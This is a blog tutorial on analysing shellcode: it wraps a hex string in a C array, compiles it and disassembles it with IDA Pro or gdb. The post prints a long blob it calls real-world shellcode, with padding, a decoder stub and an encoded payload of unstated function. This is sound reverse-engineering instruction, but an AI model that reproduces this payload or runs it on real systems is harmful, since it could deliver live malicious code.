Each Problem has An End: Shellcode Analysis

What is Shellcode?

Shellcode is nothing but self contained executable code which gets executed on the injected program. Shellcode is usually a binary chunk of data that cannot run in the same way as a normal executable. Shellcodes have the following features:

They are position independent code.

They identify the execution location.

Historically, shellcode has been used to spawn a shell on the exploited system. However, shellcode is not limited to launching a shell--- it is capable of executing any code on the system that is vulnerable to an attack.

Shellcode is often the payload of an exploit, such as buffer overflow, that attempts to execute code on the vulnerable system.It is just a bunch of hexadecimal values that represent assembly instructions (opcodes).

Problems in analyzing shellcode

Loading shellcode into IDA Pro or in a gdb for static analysis is problematic because there is no executable format that describes the contents of shellcode. Hence, in case of IDA Pro the user must provide input during the load process.IDA Pro loads the binary but performs no automatic analysis. But, I will discuss methods in the following sections to analyze shellcode that forces IDA pro or gdb debugger to perform automatic analysis.

Analyzing shellcode

Before analyzing shellcode, we have to check whether the shellcode is in hexadecimal format or in binary format.If the shellcode is in binary format, we have convert it into hexadecimal. Use the python script BinaryToHexConverter to convert the binary file into hexadecimal file. Or you can open the binary format in hex editor and copy and format the hexadecimal values to \x00 format. For example, following is the real world shellcode,which I will be using during analysis, in hexadecimal format:

\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x33\xc9\x66\xb9\x8d\x01\xeb\x17\x5e\x56\x8b\xfe\xac\x8a\xd0\x80\xea\x41\xc0\xe2\x04\xac\x2c\x41\x02\xc2\xaa\x49\x75\xee\xc3\xe8\xe4\xff\xff\xff\x49\x4a\x4f\x46\x49\x42\x4f\x4d\x45\x41\x41\x41\x41\x41\x41\x41\x4f\x4a\x44\x44\x41\x42\x41\x41\x41\x41\x46\x47\x46\x48\x49\x4c\x48\x45\x43\x45\x41\x4d\x44\x42\x50\x50\x50\x4d\x44\x42\x4d\x41\x4b\x4d\x44\x49\x4f\x41\x48\x45\x41\x4b\x4d\x42\x4d\x50\x41\x4e\x41\x42\x4d\x48\x4f\x4a\x4f\x50\x50\x50\x50\x50\x50\x50\x49\x4a\x50\x49\x46\x50\x46\x4f\x4d\x43\x41\x45\x41\x41\x47\x41\x49\x4c\x47\x4d\x43\x45\x43\x45\x49\x4c\x45\x46\x44\x4d\x49\x4c\x46\x45\x41\x46\x48\x49\x41\x42\x4f\x4b\x49\x4c\x45\x4b\x42\x49\x49\x4c\x46\x4b\x43\x41\x41\x42\x4f\x4c\x4f\x44\x43\x4b\x45\x4a\x49\x4c\x44\x45\x49\x4c\x41\x42\x4f\x4f\x46\x47\x4f\x49\x4c\x4c\x50\x50\x50\x50\x50\x50\x44\x4c\x45\x45\x43\x45\x43\x49\x48\x46\x4f\x4d\x49\x4c\x46\x4b\x43\x45\x41\x42\x4f\x4c\x47\x47\x49\x4c\x41\x4d\x45\x4c\x49\x4c\x46\x4b\x42\x4d\x41\x42\x4f\x4c\x49\x4c\x41\x45\x49\x4c\x41\x42\x4f\x49\x4f\x4a\x41\x43\x41\x41\x41\x41\x41\x41\x44\x42\x4d\x41\x49\x4a\x45\x45\x43\x45\x42\x4d\x47\x42\x4d\x43\x41\x49\x41\x41\x46\x47\x44\x42\x4d\x41\x47\x45\x49\x4c\x45\x41\x44\x41\x49\x46\x4d\x41\x48\x49\x41\x50\x49\x4c\x45\x41\x41\x4d\x49\x4c\x48\x41\x42\x4d\x4b\x4e\x49\x4c\x45\x41\x41\x49\x4f\x4a\x41\x46\x41\x41\x41\x41\x41\x41\x4f\x4a\x50\x4c\x50\x50\x50\x50\x50\x50\x46\x4f\x4d\x44\x46\x4c\x4f\x49\x4e\x4a\x50\x50\x50\x50\x50\x50\x49\x4a\x4d\x43\x47\x49\x49\x4f\x45\x4f\x41\x4f\x4f\x4d\x46\x43\x4f\x49\x49\x41\x50\x50\x50\x50\x50\x50\x49\x4a\x45\x46\x50\x4d\x47\x49\x4d\x42\x48\x4a\x4f\x46\x4c\x49\x46\x43\x4f\x49\x48\x43\x50\x50\x50\x50\x50\x50\x49\x4a\x45\x46\x50\x49\x47\x49\x49\x44\x4c\x4a\x4c\x46\x48\x49\x46\x43\x4f\x49\x47\x45\x50\x50\x50\x50\x50\x50\x49\x4a\x45\x46\x50\x45\x47\x49\x4f\x47\x42\x48\x49\x50\x48\x4c\x46\x43\x4f\x49\x46\x47\x50\x50\x50\x50\x50\x50\x49\x4a\x45\x46\x50\x41\x47\x49\x4a\x49\x50\x4f\x49\x4b\x41\x4f\x46\x43\x4f\x49\x45\x49\x50\x50\x50\x50\x50\x50\x49\x4a\x45\x46\x4f\x4d\x49\x4e\x41\x44\x46\x41\x50\x50\x46\x46\x50\x4d\x47\x49\x44\x47\x42\x4b\x43\x50\x48\x41\x46\x41\x4f\x49\x44\x45\x50\x50\x50\x50\x50\x50\x49\x4a\x45\x46\x4f\x49\x47\x49\x49\x41\x41\x41\x41\x41\x41\x41\x49\x4e\x48\x4c\x45\x49\x46\x48\x50\x50\x46\x46\x50\x49\x41\x42\x4d\x48\x4d\x48\x41\x48\x46\x4d\x44\x42\x43\x4f\x47\x46\x4d\x48\x45\x48\x41\x45\x48\x49\x47\x46\x41\x41\x41\x41\x44\x42\x4d\x4a\x46\x42\x46\x42\x49\x4e\x45\x44\x45\x49\x46\x41\x49\x4e\x45\x44\x41\x48\x46\x41\x46\x42\x50\x50\x46\x46\x4f\x49\x47\x49\x41\x46\x41\x41\x41\x41\x41\x41\x49\x4e\x45\x44\x45\x49\x46\x41\x50\x50\x46\x46\x4f\x4d\x50\x50\x46\x46\x50\x41\x47\x49\x41\x41\x41\x41\x41\x41\x41\x41\x46\x41\x50\x50\x46\x46\x50\x45\x4f\x49\x46\x47\x50\x50\x50\x50\x50\x50\x46\x46\x46\x43\x45\x4d\x45\x4e\x45\x50\x45\x4f\x41\x41\x47\x49\x48\x45\x48\x45\x48\x41\x44\x4b\x43\x50\x43\x50\x48\x48\x48\x48\x48\x48\x43\x4f\x48\x41\x48\x43\x47\x42\x47\x44\x48\x45\x47\x4a\x47\x44\x47\x42\x47\x4d\x47\x4e\x47\x42\x47\x4d\x48\x48\x47\x42\x48\x43\x47\x46\x47\x42\x47\x4f\x47\x42\x47\x4d\x48\x4a\x48\x44\x47\x4a\x48\x44\x43\x4f\x47\x44\x47\x50\x47\x4e\x43\x50\x48\x44\x47\x49\x47\x46\x47\x4d\x47\x4d\x47\x44\x47\x50\x47\x45\x47\x46\x43\x50\x47\x42\x47\x4f\x47\x4f\x47\x50\x48\x4a\x46\x50\x48\x46\x48\x44\x47\x46\x48\x43\x43\x4f\x47\x46\x48\x49\x47\x46\x41\x41

Now once you have the above format, you can make the C skeleton as follows:

unsigned char shellcode[]="\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x33\xc9\x66\xb9\x8d\x01\xeb\x17"; int main(){ }

Use shellcode as a variable and compile the program. You can use any c compiler. I have used Visual Studio 2012 to compile the C program. Once you have compiled the c program open the executable program in either IDA Pro or gdb debugger.

Fig.1 Template of shellcode

Analyzing shellcode using IDA Pro

After the C program has been compiled, open it using IDA Pro as shown below:

Fig. 2

After you have opened the compiled program in IDA Pro search for the text shellcode because shellcode variable contains the actual shellcode .

Fig.3

Fig. 4

Fig. 5

Fig. 6

Place the cursor on the shellcode and press c key in order to convert data into code. After pressing c you get the following shellcode .

Fig. 7

Fig. 8

Hence IDA pro has done the automatic analysis of shellcode for you. Now you can look into the code and find out its functionality.

Analyzing shellcode using gdb debugger

First compile the c program using gcc compiler.Then load the compiled program in gdb. For example:

$ gcc -g -o analyze-shellcode shellcode.c $ gdb analyze-shellcode (gdb) disas shellcode

Use disas shellcode command in order to analyze the shellcode variable. By default gdb debugger shows AT&T syntax. For intel syntax use the following approach:Add the following line in ~/.gdbinit file.

set disassembly-flavor intel

Fig 9

Fig. 10

Finally you can analyze the shellcode in gdb or in IDA Pro using the above approaches. For any queries please comment.

Each Problem has An End

Saturday, April 12, 2014

Shellcode Analysis

What is Shellcode?

Problems in analyzing shellcode

Analyzing shellcode

Analyzing shellcode using IDA Pro

Analyzing shellcode using gdb debugger

No comments:

Post a Comment